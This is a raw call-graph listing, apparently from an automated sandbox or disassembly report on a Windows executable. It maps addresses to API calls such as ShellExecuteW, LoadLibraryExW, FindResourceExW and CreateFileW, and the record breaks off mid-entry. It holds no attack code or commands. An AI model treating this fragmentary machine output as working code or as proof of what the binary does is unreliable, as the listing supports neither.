7ff7adc07cf4 4 API calls 93808->93809 93810 7ff7adc038a6 93809->93810 93934 7ff7adc03f9c 93810->93934 93811 7ff7adc038bf 93813 7ff7adc4b8dc SetCurrentDirectoryW 93811->93813 93814 7ff7adc038c7 93811->93814 93813->93814 93815 7ff7adc038d0 93814->93815 93955 7ff7adc6d540 AllocateAndInitializeSid CheckTokenMembership FreeSid 93814->93955 93950 7ff7adc03b84 7 API calls 93815->93950 93818 7ff7adc4b8f8 93818->93815 93821 7ff7adc4b90c 93818->93821 93823 7ff7adc05680 6 API calls 93821->93823 93822 7ff7adc038da 93825 7ff7adc06258 46 API calls 93822->93825 93828 7ff7adc038ef 93822->93828 93824 7ff7adc4b916 93823->93824 93826 7ff7adc0ec00 4 API calls 93824->93826 93825->93828 93829 7ff7adc4b927 93826->93829 93827 7ff7adc03913 93834 7ff7adc0391f SetCurrentDirectoryW 93827->93834 93828->93827 93830 7ff7adc05d88 Shell_NotifyIconW 93828->93830 93831 7ff7adc4b94d 93829->93831 93832 7ff7adc4b930 93829->93832 93830->93827 93837 7ff7adc071f8 4 API calls 93831->93837 93833 7ff7adc071f8 4 API calls 93832->93833 93835 7ff7adc4b93c 93833->93835 93836 7ff7adc03934 Concurrency::wait 93834->93836 93956 7ff7adc07c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 93835->93956 93836->93407 93839 7ff7adc4b963 GetForegroundWindow ShellExecuteW 93837->93839 93840 7ff7adc4b99f Concurrency::wait 93839->93840 93840->93827 93842->93792 93843->93790 93845 7ff7adc09640 4 API calls 93844->93845 93846 7ff7adc057d7 93845->93846 93957 7ff7adc09bbc 93846->93957 93848 7ff7adc057fe 93849 7ff7adc05680 6 API calls 93848->93849 93850 7ff7adc05812 93849->93850 93851 7ff7adc0ec00 4 API calls 93850->93851 93852 7ff7adc05823 93851->93852 93971 7ff7adc06460 93852->93971 93855 7ff7adc4c05e 94048 7ff7adc82948 93855->94048 93856 7ff7adc0584e Concurrency::wait 93997 7ff7adc0e0a8 93856->93997 93858 7ff7adc4c074 93859 7ff7adc4c081 93858->93859 93861 7ff7adc0652c 63 API calls 93858->93861 94066 7ff7adc0652c 93859->94066 93861->93859 93862 7ff7adc0586a 93864 7ff7adc0ec00 4 API calls 93862->93864 93865 7ff7adc05888 93864->93865 93868 7ff7adc4c099 93865->93868 94001 7ff7adc0eff8 93865->94001 93867 7ff7adc058ad Concurrency::wait 93869 7ff7adc0ec00 4 API calls 93867->93869 93872 7ff7adc05ab4 4 API calls 93868->93872 93870 7ff7adc058d7 93869->93870 93870->93868 93871 7ff7adc0eff8 46 API calls 93870->93871 93874 7ff7adc058fc Concurrency::wait 93871->93874 93873 7ff7adc4c0e1 93872->93873 93875 7ff7adc05ab4 4 API calls 93873->93875 93877 7ff7adc09640 4 API calls 93874->93877 93876 7ff7adc4c103 93875->93876 93880 7ff7adc05680 6 API calls 93876->93880 93878 7ff7adc0591f 93877->93878 94014 7ff7adc05ab4 93878->94014 93882 7ff7adc4c12b 93880->93882 93885 7ff7adc05ab4 4 API calls 93882->93885 93884 7ff7adc05941 93884->93868 93886 7ff7adc05949 93884->93886 93887 7ff7adc4c139 93885->93887 93889 7ff7adc28e28 wcsftime 37 API calls 93886->93889 93888 7ff7adc0e0a8 4 API calls 93887->93888 93890 7ff7adc4c14a 93888->93890 93891 7ff7adc05958 93889->93891 93892 7ff7adc05ab4 4 API calls 93890->93892 93891->93873 93893 7ff7adc05960 93891->93893 93894 7ff7adc4c15b 93892->93894 93895 7ff7adc28e28 wcsftime 37 API calls 93893->93895 93898 7ff7adc0e0a8 4 API calls 93894->93898 93896 7ff7adc0596f 93895->93896 93896->93876 93897 7ff7adc05977 93896->93897 93899 7ff7adc28e28 wcsftime 37 API calls 93897->93899 93900 7ff7adc4c172 93898->93900 93901 7ff7adc05986 93899->93901 93902 7ff7adc05ab4 4 API calls 93900->93902 93903 7ff7adc059c6 93901->93903 93906 7ff7adc05ab4 4 API calls 93901->93906 93905 7ff7adc4c183 93902->93905 93903->93894 93904 7ff7adc059d3 93903->93904 94037 7ff7adc0df90 93904->94037 93907 7ff7adc059a8 93906->93907 93908 7ff7adc0e0a8 4 API calls 93907->93908 93910 7ff7adc059b5 93908->93910 93912 7ff7adc05ab4 4 API calls 93910->93912 93912->93903 93914 7ff7adc0d670 5 API calls 93915 7ff7adc05a12 93914->93915 93915->93914 93916 7ff7adc05ab4 4 API calls 93915->93916 93917 7ff7adc05a60 Concurrency::wait 93915->93917 93916->93915 93917->93800 93919 7ff7adc03f29 wcsftime 93918->93919 93920 7ff7adc4ba2c memcpy_s 93919->93920 93921 7ff7adc03f4b 93919->93921 93924 7ff7adc4ba4d GetOpenFileNameW 93920->93924 93922 7ff7adc056d4 5 API calls 93921->93922 93923 7ff7adc03f56 93922->93923 94411 7ff7adc03eb4 93923->94411 93926 7ff7adc03858 93924->93926 93927 7ff7adc4bab0 93924->93927 93926->93808 93926->93811 93929 7ff7adc07cf4 4 API calls 93927->93929 93931 7ff7adc4babc 93929->93931 93932 7ff7adc03f6c 94429 7ff7adc06394 93932->94429 93935 7ff7adc03fb6 wcsftime 93934->93935 94472 7ff7adc09734 93935->94472 93937 7ff7adc03fc4 93948 7ff7adc04050 93937->93948 94482 7ff7adc04d28 77 API calls 93937->94482 93939 7ff7adc03fd3 93939->93948 94483 7ff7adc04b0c 79 API calls Concurrency::wait 93939->94483 93941 7ff7adc03fe0 93942 7ff7adc03fe8 GetFullPathNameW 93941->93942 93941->93948 93943 7ff7adc07cf4 4 API calls 93942->93943 93944 7ff7adc04014 93943->93944 93945 7ff7adc07cf4 4 API calls 93944->93945 93946 7ff7adc04028 93945->93946 93947 7ff7adc07cf4 4 API calls 93946->93947 93949 7ff7adc4bac2 wcscat 93946->93949 93947->93948 93948->93811 94487 7ff7adc03d90 7 API calls 93950->94487 93952 7ff7adc038d5 93953 7ff7adc03cbc CreateWindowExW CreateWindowExW ShowWindow ShowWindow 93952->93953 93954->93811 93955->93818 93956->93831 93958 7ff7adc09be5 wcsftime 93957->93958 93959 7ff7adc07cf4 4 API calls 93958->93959 93960 7ff7adc09c1b 93958->93960 93959->93960 93969 7ff7adc09c4a Concurrency::wait 93960->93969 94072 7ff7adc09d84 93960->94072 93962 7ff7adc09d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93962->93969 93963 7ff7adc0ec00 4 API calls 93964 7ff7adc09d4a 93963->93964 93966 7ff7adc04680 4 API calls 93964->93966 93965 7ff7adc0ec00 4 API calls 93965->93969 93967 7ff7adc09d57 Concurrency::wait 93966->93967 93967->93848 93968 7ff7adc04680 4 API calls 93968->93969 93969->93962 93969->93965 93969->93968 93970 7ff7adc09d21 93969->93970 93970->93963 93970->93967 94075 7ff7adc06d64 93971->94075 93974 7ff7adc06d64 2 API calls 93977 7ff7adc0649d 93974->93977 93975 7ff7adc064c0 94079 7ff7adc348e0 93975->94079 93976 7ff7adc064ba FreeLibrary 93976->93975 93977->93975 93977->93976 93980 7ff7adc4c8f6 93983 7ff7adc0652c 63 API calls 93980->93983 93981 7ff7adc064db LoadLibraryExW 94098 7ff7adc06cc4 93981->94098 93985 7ff7adc4c8fe 93983->93985 93987 7ff7adc06cc4 3 API calls 93985->93987 93989 7ff7adc4c907 93987->93989 93988 7ff7adc06505 93988->93989 93990 7ff7adc06512 93988->93990 94120 7ff7adc067d8 93989->94120 93991 7ff7adc0652c 63 API calls 93990->93991 93994 7ff7adc05846 93991->93994 93994->93855 93994->93856 93996 7ff7adc4c93f 93998 7ff7adc0e0bb 93997->93998 93999 7ff7adc0e0b6 93997->93999 93998->93862 94323 7ff7adc0f0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 93999->94323 94324 7ff7adc11a30 94001->94324 94003 7ff7adc0f029 94004 7ff7adc5a7a8 94003->94004 94005 7ff7adc0f040 94003->94005 94340 7ff7adc0ee20 5 API calls Concurrency::wait 94004->94340 94008 7ff7adc24c68 4 API calls 94005->94008 94007 7ff7adc5a7bc 94009 7ff7adc0f066 94008->94009 94011 7ff7adc0f08f 94009->94011 94339 7ff7adc0f0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94009->94339 94335 7ff7adc0f1bc 94011->94335 94013 7ff7adc0f0c6 94013->93867 94015 7ff7adc05ac6 94014->94015 94016 7ff7adc05ae4 94014->94016 94017 7ff7adc0e0a8 4 API calls 94015->94017 94018 7ff7adc07cf4 4 API calls 94016->94018 94019 7ff7adc0592d 94017->94019 94018->94019 94020 7ff7adc28e28 94019->94020 94021 7ff7adc28e3f 94020->94021 94022 7ff7adc28ea4 94020->94022 94032 7ff7adc28e63 94021->94032 94342 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 94021->94342 94344 7ff7adc28d98 35 API calls 2 library calls 94022->94344 94025 7ff7adc28ed6 94027 7ff7adc28ee2 94025->94027 94029 7ff7adc28ef9 94025->94029 94026 7ff7adc28e49 94343 7ff7adc3b164 31 API calls _invalid_parameter_noinfo 94026->94343 94345 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 94027->94345 94035 7ff7adc32c80 37 API calls wcsftime 94029->94035 94036 7ff7adc28ef2 94029->94036 94031 7ff7adc28e54 94031->93884 94032->93884 94033 7ff7adc28ee7 94346 7ff7adc3b164 31 API calls _invalid_parameter_noinfo 94033->94346 94035->94029 94036->93884 94038 7ff7adc0dfac 94037->94038 94039 7ff7adc24c68 4 API calls 94038->94039 94040 7ff7adc059f5 94038->94040 94039->94040 94041 7ff7adc0d670 94040->94041 94042 7ff7adc0d698 94041->94042 94046 7ff7adc0d6a2 94042->94046 94347 7ff7adc0880c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94042->94347 94045 7ff7adc59d43 94047 7ff7adc0d7de 94046->94047 94348 7ff7adc0ee20 5 API calls Concurrency::wait 94046->94348 94047->93915 94049 7ff7adc829c8 94048->94049 94349 7ff7adc82b70 94049->94349 94052 7ff7adc067d8 45 API calls 94053 7ff7adc82a03 94052->94053 94054 7ff7adc067d8 45 API calls 94053->94054 94055 7ff7adc82a23 94054->94055 94056 7ff7adc067d8 45 API calls 94055->94056 94057 7ff7adc82a49 94056->94057 94058 7ff7adc067d8 45 API calls 94057->94058 94059 7ff7adc82a6d 94058->94059 94060 7ff7adc067d8 45 API calls 94059->94060 94061 7ff7adc82ac5 94060->94061 94062 7ff7adc8240c 32 API calls 94061->94062 94063 7ff7adc82ada 94062->94063 94065 7ff7adc829de 94063->94065 94354 7ff7adc81d48 94063->94354 94065->93858 94067 7ff7adc0653d 94066->94067 94069 7ff7adc06542 94066->94069 94068 7ff7adc34970 62 API calls 94067->94068 94068->94069 94070 7ff7adc0656f FreeLibrary 94069->94070 94071 7ff7adc06558 94069->94071 94070->94071 94071->93868 94073 7ff7adc0a7c0 4 API calls 94072->94073 94074 7ff7adc09d99 94073->94074 94074->93960 94076 7ff7adc06d74 LoadLibraryA 94075->94076 94077 7ff7adc06490 94075->94077 94076->94077 94078 7ff7adc06d89 GetProcAddress 94076->94078 94077->93974 94077->93977 94078->94077 94080 7ff7adc347fc 94079->94080 94081 7ff7adc3482a 94080->94081 94084 7ff7adc3485c 94080->94084 94140 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 94081->94140 94083 7ff7adc3482f 94141 7ff7adc3b164 31 API calls _invalid_parameter_noinfo 94083->94141 94086 7ff7adc34862 94084->94086 94087 7ff7adc3486f 94084->94087 94142 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 94086->94142 94128 7ff7adc3feb4 94087->94128 94091 7ff7adc064cf 94091->93980 94091->93981 94092 7ff7adc34890 94135 7ff7adc40304 94092->94135 94093 7ff7adc34883 94143 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 94093->94143 94096 7ff7adc348a3 94144 7ff7adc2df60 LeaveCriticalSection 94096->94144 94282 7ff7adc06d1c 94098->94282 94101 7ff7adc064f7 94105 7ff7adc06580 94101->94105 94102 7ff7adc06d0f FreeLibrary 94102->94101 94103 7ff7adc06d1c 2 API calls 94104 7ff7adc06cf1 94103->94104 94104->94101 94104->94102 94106 7ff7adc24c68 4 API calls 94105->94106 94107 7ff7adc065b5 memcpy_s 94106->94107 94108 7ff7adc06740 CreateStreamOnHGlobal 94107->94108 94109 7ff7adc4c9f5 94107->94109 94112 7ff7adc06602 94107->94112 94111 7ff7adc06759 FindResourceExW 94108->94111 94108->94112 94286 7ff7adc82e00 45 API calls 94109->94286 94111->94112 94113 7ff7adc4c97e LoadResource 94112->94113 94114 7ff7adc067d8 45 API calls 94112->94114 94116 7ff7adc4c9fd 94112->94116 94119 7ff7adc066e8 94112->94119 94113->94112 94115 7ff7adc4c997 SizeofResource 94113->94115 94114->94112 94115->94112 94117 7ff7adc4c9ae LockResource 94115->94117 94118 7ff7adc067d8 45 API calls 94116->94118 94117->94112 94118->94119 94119->93988 94121 7ff7adc067f7 94120->94121 94124 7ff7adc4ca6c 94120->94124 94287 7ff7adc34c5c 94121->94287 94125 7ff7adc8240c 94306 7ff7adc82200 94125->94306 94127 7ff7adc82430 94127->93996 94145 7ff7adc3b9bc EnterCriticalSection 94128->94145 94130 7ff7adc3fecb 94131 7ff7adc3ff54 18 API calls 94130->94131 94132 7ff7adc3fed6 94131->94132 94133 7ff7adc3ba10 _isindst LeaveCriticalSection 94132->94133 94134 7ff7adc34879 94133->94134 94134->94092 94134->94093 94146 7ff7adc40040 94135->94146 94138 7ff7adc4035e 94138->94096 94140->94083 94141->94091 94142->94091 94143->94091 94151 7ff7adc4007d try_get_function 94146->94151 94148 7ff7adc402de 94165 7ff7adc3b164 31 API calls _invalid_parameter_noinfo 94148->94165 94150 7ff7adc4021a 94150->94138 94158 7ff7adc47738 94150->94158 94157 7ff7adc40211 94151->94157 94161 7ff7adc2db68 37 API calls 4 library calls 94151->94161 94153 7ff7adc40277 94153->94157 94162 7ff7adc2db68 37 API calls 4 library calls 94153->94162 94155 7ff7adc4029a 94155->94157 94163 7ff7adc2db68 37 API calls 4 library calls 94155->94163 94157->94150 94164 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 94157->94164 94166 7ff7adc46d04 94158->94166 94161->94153 94162->94155 94163->94157 94164->94148 94165->94150 94167 7ff7adc46d28 94166->94167 94168 7ff7adc46d40 94166->94168 94220 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 94167->94220 94168->94167 94171 7ff7adc46d6d 94168->94171 94170 7ff7adc46d2d 94221 7ff7adc3b164 31 API calls _invalid_parameter_noinfo 94170->94221 94177 7ff7adc47348 94171->94177 94175 7ff7adc46d39 94175->94138 94223 7ff7adc47078 94177->94223 94180 7ff7adc473bc 94255 7ff7adc355b4 15 API calls _invalid_parameter_noinfo 94180->94255 94181 7ff7adc473d3 94243 7ff7adc3e418 94181->94243 94185 7ff7adc473c1 94256 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 94185->94256 94186 7ff7adc473f7 CreateFileW 94189 7ff7adc47469 94186->94189 94190 7ff7adc474eb GetFileType 94186->94190 94187 7ff7adc473df 94257 7ff7adc355b4 15 API calls _invalid_parameter_noinfo 94187->94257 94195 7ff7adc474b8 GetLastError 94189->94195 94198 7ff7adc47478 CreateFileW 94189->94198 94192 7ff7adc47549 94190->94192 94193 7ff7adc474f8 GetLastError 94190->94193 94262 7ff7adc3e334 16 API calls 2 library calls 94192->94262 94260 7ff7adc35564 15 API calls 2 library calls 94193->94260 94194 7ff7adc473e4 94258 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 94194->94258 94259 7ff7adc35564 15 API calls 2 library calls 94195->94259 94198->94190 94198->94195 94200 7ff7adc47507 CloseHandle 94200->94185 94201 7ff7adc47539 94200->94201 94261 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 94201->94261 94204 7ff7adc47568 94206 7ff7adc475b5 94204->94206 94263 7ff7adc47284 67 API calls 2 library calls 94204->94263 94205 7ff7adc4753e 94205->94185 94210 7ff7adc475ec 94206->94210 94264 7ff7adc46de4 67 API calls 4 library calls 94206->94264 94209 7ff7adc475e8 94209->94210 94211 7ff7adc475fe 94209->94211 94265 7ff7adc404b8 94210->94265 94213 7ff7adc46d95 94211->94213 94214 7ff7adc47681 CloseHandle CreateFileW 94211->94214 94213->94175 94222 7ff7adc3e3f4 LeaveCriticalSection 94213->94222 94215 7ff7adc476f9 94214->94215 94216 7ff7adc476cb GetLastError 94214->94216 94215->94213 94280 7ff7adc35564 15 API calls 2 library calls 94216->94280 94218 7ff7adc476d8 94281 7ff7adc3e548 16 API calls 2 library calls 94218->94281 94220->94170 94221->94175 94224 7ff7adc470a4 94223->94224 94231 7ff7adc470be 94223->94231 94225 7ff7adc355d4 memcpy_s 15 API calls 94224->94225 94224->94231 94226 7ff7adc470b3 94225->94226 94227 7ff7adc3b164 _invalid_parameter_noinfo 31 API calls 94226->94227 94227->94231 94228 7ff7adc4718c 94230 7ff7adc32554 31 API calls 94228->94230 94241 7ff7adc471ec 94228->94241 94229 7ff7adc4713b 94229->94228 94232 7ff7adc355d4 memcpy_s 15 API calls 94229->94232 94233 7ff7adc471e8 94230->94233 94231->94229 94234 7ff7adc355d4 memcpy_s 15 API calls 94231->94234 94235 7ff7adc47181 94232->94235 94236 7ff7adc4726b 94233->94236 94233->94241 94237 7ff7adc47130 94234->94237 94238 7ff7adc3b164 _invalid_parameter_noinfo 31 API calls 94235->94238 94239 7ff7adc3b184 _invalid_parameter_noinfo 16 API calls 94236->94239 94240 7ff7adc3b164 _invalid_parameter_noinfo 31 API calls 94237->94240 94238->94228 94242 7ff7adc47280 94239->94242 94240->94229 94241->94180 94241->94181 94244 7ff7adc3b9bc _isindst EnterCriticalSection 94243->94244 94251 7ff7adc3e43b 94244->94251 94245 7ff7adc3e487 94247 7ff7adc3ba10 _isindst LeaveCriticalSection 94245->94247 94246 7ff7adc3e464 94248 7ff7adc3e170 16 API calls 94246->94248 94249 7ff7adc3e52a 94247->94249 94250 7ff7adc3e469 94248->94250 94249->94186 94249->94187 94250->94245 94253 7ff7adc3e310 fwprintf EnterCriticalSection 94250->94253 94251->94245 94251->94246 94252 7ff7adc3e4c2 EnterCriticalSection 94251->94252 94252->94245 94254 7ff7adc3e4d1 LeaveCriticalSection 94252->94254 94253->94245 94254->94251 94255->94185 94256->94213 94257->94194 94258->94185 94259->94185 94260->94200 94261->94205 94262->94204 94263->94206 94264->94209 94266 7ff7adc3e604 31 API calls 94265->94266 94269 7ff7adc404cc 94266->94269 94267 7ff7adc404d2 94268 7ff7adc3e548 16 API calls 94267->94268 94271 7ff7adc40534 94268->94271 94269->94267 94272 7ff7adc3e604 31 API calls 94269->94272 94279 7ff7adc4050c 94269->94279 94270 7ff7adc3e604 31 API calls 94274 7ff7adc40518 CloseHandle 94270->94274 94277 7ff7adc35564 fread_s 15 API calls 94271->94277 94278 7ff7adc40560 94271->94278 94273 7ff7adc404ff 94272->94273 94275 7ff7adc3e604 31 API calls 94273->94275 94274->94267 94276 7ff7adc40525 GetLastError 94274->94276 94275->94279 94276->94267 94277->94278 94278->94213 94279->94267 94279->94270 94280->94218 94281->94215 94283 7ff7adc06ce3 94282->94283 94284 7ff7adc06d2c LoadLibraryA 94282->94284 94283->94103 94283->94104 94284->94283 94285 7ff7adc06d41 GetProcAddress 94284->94285 94285->94283 94286->94116 94290 7ff7adc34c7c 94287->94290 94291 7ff7adc34ca6 94290->94291 94301 7ff7adc0680a 94290->94301 94292 7ff7adc34cd7 94291->94292 94293 7ff7adc34cb5 memcpy_s 94291->94293 94291->94301 94305 7ff7adc2df54 EnterCriticalSection 94292->94305 94303 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 94293->94303 94297 7ff7adc34cca 94304 7ff7adc3b164 31 API calls _invalid_parameter_noinfo 94297->94304 94301->94125 94303->94297 94304->94301 94309 7ff7adc347bc 94306->94309 94308 7ff7adc82210 94308->94127 94312 7ff7adc34724 94309->94312 94313 7ff7adc34732 94312->94313 94314 7ff7adc34746 94312->94314 94320 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 94313->94320 94315 7ff7adc34742 94314->94315 94322 7ff7adc3bef8 6 API calls __crtLCMapStringW 94314->94322 94315->94308 94318 7ff7adc34737 94321 7ff7adc3b164 31 API calls _invalid_parameter_noinfo 94318->94321 94320->94318 94321->94315 94322->94315 94323->93998 94325 7ff7adc11a48 94324->94325 94326 7ff7adc11c5f 94324->94326 94331 7ff7adc11a90 94325->94331 94341 7ff7adc25114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94325->94341 94326->94003 94331->94003 94336 7ff7adc0f1ce 94335->94336 94338 7ff7adc0f1d8 94335->94338 94337 7ff7adc11a30 45 API calls 94336->94337 94337->94338 94338->94013 94339->94011 94340->94007 94342->94026 94343->94031 94344->94025 94345->94033 94346->94036 94347->94046 94348->94045 94353 7ff7adc82bae 94349->94353 94350 7ff7adc067d8 45 API calls 94350->94353 94351 7ff7adc829da 94351->94052 94351->94065 94352 7ff7adc8240c 32 API calls 94352->94353 94353->94350 94353->94351 94353->94352 94355 7ff7adc81d71 94354->94355 94356 7ff7adc81d61 94354->94356 94358 7ff7adc81dbf 94355->94358 94359 7ff7adc348e0 89 API calls 94355->94359 94360 7ff7adc81d7a 94355->94360 94357 7ff7adc348e0 89 API calls 94356->94357 94357->94355 94381 7ff7adc82038 94358->94381 94361 7ff7adc81d9e 94359->94361 94360->94065 94361->94358 94363 7ff7adc81da7 94361->94363 94363->94360 94393 7ff7adc34970 94363->94393 94364 7ff7adc81df5 94365 7ff7adc81e1c 94364->94365 94366 7ff7adc81df9 94364->94366 94371 7ff7adc81e4a 94365->94371 94372 7ff7adc81e2a 94365->94372 94368 7ff7adc81e07 94366->94368 94369 7ff7adc34970 62 API calls 94366->94369 94368->94360 94370 7ff7adc34970 62 API calls 94368->94370 94369->94368 94370->94360 94385 7ff7adc81e88 94371->94385 94373 7ff7adc81e38 94372->94373 94375 7ff7adc34970 62 API calls 94372->94375 94373->94360 94376 7ff7adc34970 62 API calls 94373->94376 94375->94373 94376->94360 94377 7ff7adc81e68 94377->94360 94380 7ff7adc34970 62 API calls 94377->94380 94378 7ff7adc81e52 94378->94377 94379 7ff7adc34970 62 API calls 94378->94379 94379->94377 94380->94360 94382 7ff7adc82069 94381->94382 94384 7ff7adc82056 memcpy_s 94381->94384 94383 7ff7adc34c5c _fread_nolock 45 API calls 94382->94383 94383->94384 94384->94364 94386 7ff7adc81fb0 94385->94386 94392 7ff7adc81eaa 94385->94392 94388 7ff7adc81fd3 94386->94388 94407 7ff7adc32a04 60 API calls 2 library calls 94386->94407 94388->94378 94390 7ff7adc81bd0 45 API calls 94390->94392 94392->94386 94392->94388 94392->94390 94405 7ff7adc81c9c 45 API calls 94392->94405 94406 7ff7adc820cc 60 API calls 94392->94406 94394 7ff7adc3498e 94393->94394 94395 7ff7adc349a3 94393->94395 94409 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 94394->94409 94397 7ff7adc3499e 94395->94397 94408 7ff7adc2df54 EnterCriticalSection 94395->94408 94397->94360 94398 7ff7adc34993 94410 7ff7adc3b164 31 API calls _invalid_parameter_noinfo 94398->94410 94400 7ff7adc349b9 94402 7ff7adc348ec 60 API calls 94400->94402 94403 7ff7adc349c2 94402->94403 94404 7ff7adc2df60 fflush LeaveCriticalSection 94403->94404 94404->94397 94405->94392 94406->94392 94407->94388 94409->94398 94410->94397 94412 7ff7adc48f90 wcsftime 94411->94412 94413 7ff7adc03ec4 GetLongPathNameW 94412->94413 94414 7ff7adc07cf4 4 API calls 94413->94414 94415 7ff7adc03eed 94414->94415 94416 7ff7adc04074 94415->94416 94417 7ff7adc09640 4 API calls 94416->94417 94418 7ff7adc0408e 94417->94418 94419 7ff7adc056d4 5 API calls 94418->94419 94420 7ff7adc0409b 94419->94420 94421 7ff7adc4bada 94420->94421 94422 7ff7adc040a7 94420->94422 94427 7ff7adc4bb0f 94421->94427 94463 7ff7adc21ad0 CompareStringW 94421->94463 94423 7ff7adc04680 4 API calls 94422->94423 94425 7ff7adc040b5 94423->94425 94459 7ff7adc040e8 94425->94459 94428 7ff7adc040cb Concurrency::wait 94428->93932 94430 7ff7adc06460 105 API calls 94429->94430 94431 7ff7adc063e5 94430->94431 94432 7ff7adc4c656 94431->94432 94433 7ff7adc06460 105 API calls 94431->94433 94434 7ff7adc82948 90 API calls 94432->94434 94435 7ff7adc06400 94433->94435 94436 7ff7adc4c66e 94434->94436 94435->94432 94437 7ff7adc06408 94435->94437 94438 7ff7adc4c690 94436->94438 94439 7ff7adc4c672 94436->94439 94441 7ff7adc4c67b 94437->94441 94442 7ff7adc06414 94437->94442 94440 7ff7adc24c68 4 API calls 94438->94440 94443 7ff7adc0652c 63 API calls 94439->94443 94458 7ff7adc4c6dd Concurrency::wait 94440->94458 94465 7ff7adc7c5c8 77 API calls wprintf 94441->94465 94464 7ff7adc0e774 143 API calls Concurrency::wait 94442->94464 94443->94441 94446 7ff7adc06438 94446->93926 94447 7ff7adc4c68a 94447->94438 94448 7ff7adc4c895 94449 7ff7adc0652c 63 API calls 94448->94449 94457 7ff7adc4c8a9 94449->94457 94454 7ff7adc0ec00 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94454->94458 94457->94448 94471 7ff7adc776d8 77 API calls 3 library calls 94457->94471 94458->94448 94458->94454 94458->94457 94466 7ff7adc77400 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94458->94466 94467 7ff7adc7730c 39 API calls 94458->94467 94468 7ff7adc80210 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94458->94468 94469 7ff7adc0b26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94458->94469 94470 7ff7adc09940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94458->94470 94460 7ff7adc04107 94459->94460 94461 7ff7adc04130 memcpy_s 94459->94461 94462 7ff7adc24c68 4 API calls 94460->94462 94461->94428 94462->94461 94463->94421 94464->94446 94465->94447 94466->94458 94467->94458 94468->94458 94469->94458 94470->94458 94471->94457 94473 7ff7adc09762 94472->94473 94477 7ff7adc0988d 94472->94477 94474 7ff7adc24c68 4 API calls 94473->94474 94473->94477 94475 7ff7adc09791 94474->94475 94476 7ff7adc24c68 4 API calls 94475->94476 94480 7ff7adc0981c 94476->94480 94477->93937 94480->94477 94484 7ff7adc0abe0 81 API calls 2 library calls 94480->94484 94485 7ff7adc09940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94480->94485 94486 7ff7adc0b26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94480->94486 94482->93939 94483->93941 94484->94480 94485->94480 94486->94480 94487->93952 94488 7ff7adc28fac 94489 7ff7adc2901c 94488->94489 94490 7ff7adc28fd2 GetModuleHandleW 94488->94490 94505 7ff7adc3b9bc EnterCriticalSection 94489->94505 94490->94489 94499 7ff7adc28fdf 94490->94499 94492 7ff7adc290cb 94493 7ff7adc3ba10 _isindst LeaveCriticalSection 94492->94493 94494 7ff7adc290f0 94493->94494 94497 7ff7adc290fc 94494->94497 94502 7ff7adc29118 11 API calls 94494->94502 94495 7ff7adc290a0 94496 7ff7adc290b8 94495->94496 94500 7ff7adc3ada4 75 API calls 94495->94500 94501 7ff7adc3ada4 75 API calls 94496->94501 94498 7ff7adc29026 94498->94492 94498->94495 94503 7ff7adc3aa8c 30 API calls 94498->94503 94499->94489 94506 7ff7adc29164 GetModuleHandleExW 94499->94506 94500->94496 94501->94492 94502->94497 94503->94495 94507 7ff7adc2918e GetProcAddress 94506->94507 94508 7ff7adc291b5 94506->94508 94507->94508 94511 7ff7adc291a8 94507->94511 94509 7ff7adc291bf FreeLibrary 94508->94509 94510 7ff7adc291c5 94508->94510 94509->94510 94510->94489 94511->94508 94512 7ff7adc15f13 94514 7ff7adc15f1c memcpy_s 94512->94514 94515 7ff7adc614b6 94514->94515 94518 7ff7adc15f74 94514->94518 94521 7ff7adc15abd memcpy_s Concurrency::wait 94514->94521 94522 7ff7adc24c68 4 API calls 94514->94522 94523 7ff7adc0d4cc 94514->94523 94542 7ff7adc2364c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94515->94542 94517 7ff7adc614c5 94519 7ff7adc0e0a8 4 API calls 94517->94519 94520 7ff7adc0b960 4 API calls 94518->94520 94519->94521 94520->94521 94522->94514 94524 7ff7adc0d50b 94523->94524 94537 7ff7adc0d4f2 94523->94537 94525 7ff7adc0d53e 94524->94525 94526 7ff7adc0d513 94524->94526 94528 7ff7adc59bbc 94525->94528 94529 7ff7adc0d550 94525->94529 94535 7ff7adc59cc4 94525->94535 94543 7ff7adc2956c 31 API calls 94526->94543 94538 7ff7adc24c68 4 API calls 94528->94538 94539 7ff7adc59c3e Concurrency::wait wcscpy 94528->94539 94544 7ff7adc24834 46 API calls 94529->94544 94531 7ff7adc0d522 94536 7ff7adc0ec00 4 API calls 94531->94536 94533 7ff7adc59cdc 94546 7ff7adc29538 31 API calls 94535->94546 94536->94537 94537->94514 94540 7ff7adc59c0a 94538->94540 94545 7ff7adc24834 46 API calls 94539->94545 94541 7ff7adc0ec00 4 API calls 94540->94541 94541->94539 94542->94517 94543->94531 94544->94531 94545->94535 94546->94533 94547 7ff7adc5f890 94556 7ff7adc0e18c 94547->94556 94549 7ff7adc5f8a9 94550 7ff7adc5f915 Concurrency::wait 94549->94550 94562 7ff7adc22ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection 